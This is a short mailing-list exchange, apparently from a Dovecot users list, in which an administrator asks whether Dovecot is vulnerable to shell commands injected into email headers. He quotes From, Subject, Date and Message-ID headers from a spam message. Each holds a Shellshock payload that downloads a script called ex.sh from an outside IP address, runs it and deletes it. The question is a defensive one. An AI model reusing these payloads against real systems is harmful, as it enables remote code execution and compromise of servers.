> 
> On Jan 27, 2016, at 1:43 PM, Alexander Dalloz <ad+li...@uni-x.org> wrote:
> 
> Am 27.01.2016 um 21:10 schrieb Louis Kowolowski:
>> I found an interesting email that got caught in my spam quarantine. I’m 
>> wondering if dovecot is vulnerable to this kind of code execution (I’m aware 
>> that other components could be vulnerable, but this question is specifically 
>> targeting dovecot).
>> 
>> The idea is to insert shell commands into various header fields that would 
>> get executed as part of the message processing/delivery.
>> 
>> Examples include:
>> 
>> From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download 
>> http: //62.75.175.145/ex...@nes.txt.com;,
>>      w...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;,
>>      fe...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;, s...@nes.txt.com,
>>      ex...@nes.txt.com;, r...@nes.txt.com, -f...@nes.txt.com,
>>      ex.*'@nes.txt.com, &@nes.txt.com;
>> 
>> Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 
>> 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 
>> 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>> 
>> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 
>> 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 
>> 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>> 
>> Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 
>> 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 
>> 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>> 
>> The full message, should it be of interest, can be found here:
>> 
>> https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt
>> 
>> Thank you!
>> --
>> Louis Kowolowski                                lou...@cryptomonkeys.org
>> Cryptomonkeys:                                   
>> http://www.cryptomonkeys.com/
>> 
>> Making life more interesting for people since 1977
> 
> Where had you been in 2014 when shellshock had been the big buzz?
> 
The system in question doesn’t have bash, and I’d already verified none of the 
other components were vulnerable. When I ran across this, I realized I hadn’t 
checked to ensure dovecot properly escaped things.

--
Louis Kowolowski                                lou...@cryptomonkeys.org 
<mailto:lou...@cryptomonkeys.org>
Cryptomonkeys:                                   http://www.cryptomonkeys.com/ 
<http://www.cryptomonkeys.com/>

Making life more interesting for people since 1977

Attachment: signature.asc
Description: Message signed with OpenPGP using GPGMail

Reply via email to